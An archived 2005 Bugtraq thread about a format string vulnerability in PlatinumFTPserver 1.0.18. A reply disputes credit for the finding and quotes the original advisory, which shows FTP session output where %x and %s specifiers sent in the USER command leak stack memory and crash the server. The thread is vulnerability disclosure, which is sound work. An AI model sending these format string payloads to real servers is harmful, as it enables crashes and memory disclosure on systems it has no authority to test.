lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <003801c52a6d$3e633ca0$1e00a8c0@eniac>
Date: Wed, 16 Mar 2005 16:15:08 -0500
From: "Gary H. Jones II" <gary@...ntblanksecurity.com>
To: <c0d3r@...team.com>, <bugtraq@...urityfocus.com>
Cc: <news@...uriteam.com>
Subject: Re: PlatinumFTPserver format string vulnerability ( IHSTeam )


Actually, the credits don't go to you, these vulnerabilities have been found
already.  I've replied recently to this mailing list in regards to this
software.
If you had disassembled the binary, then why not mention that the
vulnerability exists in a 3rd party ActiveX control, and not the software
itself?

My reply,
http://www.securityfocus.com/archive/1/393256/2005-03-13/2005-03-19/0

Please read the links below,
http://www.osvdb.org/displayvuln.php?osvdb_id=3461
http://secunia.com/advisories/9127/
http://secunia.com/advisories/10608/
http://secunia.com/advisories/9013/


-Gary H. Jones II


----- Original Message ----- 
From: <c0d3r@...team.com>
To: <bugtraq@...urityfocus.com>
Cc: <news@...uriteam.com>
Sent: Wednesday, March 16, 2005 8:56 AM
Subject: PlatinumFTPserver format string vulnerability ( IHSTeam )


**********************************************************************
advisory URL :  http://www.ihsteam.com/advisory/PlatinumFTPserver.txt
**********************************************************************

********************************************
IHS Iran Hackers Sabotage Public advisory
by : c0d3r "Kaveh Razavi"  c0d3r@...team.com
********************************************

well yesterday a guy found a simple user overflow in PlatinumFTPserver vr
: 1.0.18 and prior.
I downloaded the package at :
http://www.roboshareware.com/products/PlatinumFTPserver.exe
and started to disassemble the vulnerability . He was written a DoS .
PlantiumFTP has got a good error controlling system . so eip overwrite is
not easy .
but I found another vulnerability when I was fuzzing .
the server is also vulnerable to USER format string attack .
here is the result :
---------------------------------------
C:\Documents and Settings\root>ftp
ftp> open 127.0.0.1
Connected to 127.0.0.1.
220-PlatinumFTPserver V1.0.18
220 Enter login details
User (127.0.0.1:(none)): user %x%x
331 Password required for user 026d0048.
Password:
---------------------------------------
ftp> user AAAA%x%x%x%x
331 Password required for user AAAA026d0048020313333.
Password:
---------------------------------------
ftp> user
AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x
331 Password required for
AAAA026d00480203133337373615064726f7771657220657269756f662064414120727825414
1782578257825782578257825782578257825782578257825782578257825782578257825782
5782578257825782578257825782578257825782578257825782578257825782578257825782
5d2e782512000a77f5508212cdd812ce1012cdfc12cdb01305dc012ce00.
Password:
---------------------------------------
ftp> user AAAA%s%s
331 Password required for AAAAÈsÈjÈ{PÈ`     .
Password:
---------------------------------------
ftp> user
AAAA%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s
hanging ==>
szAppName : PlatinumFTPserverEngine.exe     szAppVer : 1.0.0.18
szModName : user32.dll     szModVer : 5.1.2600.1106     offset : 00008f7f
The instruction at "0x01606feb" refrenced memory at "0xaf613daf". the
memory could not be "written".
---------------------------------------
and these kinda playing !

I am busy with university etrance exam stuff so I cant write the exploit
code and really it doesnt cost .
well laters . and this will be the last sweet to IHS until my shitty exam .
all the credits go to IHSteam.com .
greetz fly to : LorD and NT of ihsteam , Jamie of exploitdev.org and other
friends and security teams .
well I will come to u later shervin_kesafat my great lamer !






Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ